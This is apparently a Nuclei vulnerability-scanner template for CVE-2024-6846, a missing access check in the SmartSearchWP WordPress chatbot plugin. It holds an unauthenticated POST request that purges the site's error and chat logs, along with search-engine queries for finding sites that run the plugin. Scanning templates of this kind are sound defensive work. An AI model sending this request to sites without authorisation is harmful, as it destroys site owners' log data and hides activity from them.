42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: CVE-2024-6846
|
|
|
|
info:
|
|
name: SmartSearchWP <= 2.4.4 - Unauthenticated Log Purge
|
|
author: s4e-io
|
|
severity: medium
|
|
description: |
|
|
The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not validate access on some REST routes, allowing for an unauthenticated user to purge error and chat logs.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/d48fdab3-669c-4870-a2f9-6c39a7c25fd8/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-6846
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2024-6846
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
vendor: webdigit
|
|
product: smartsearchwp
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/smartsearchwp"
|
|
fofa-query: body="/wp-content/plugins/smartsearchwp"
|
|
tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,smartsearchwp,chatgpt
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"months":"1"}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body,"success","true", "purged successfully")'
|
|
- 'contains(content_type,"application/json")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a004730450221009374912bcca96f962aab6d3b29da49d93dee3e50407b7e292b50e56def1a065702200f99ee6eb68fe498ae29291c99b8217949f6dd312cbf98776ee93947ed28c068:922c64590222798bb761d5b6d8e72950 |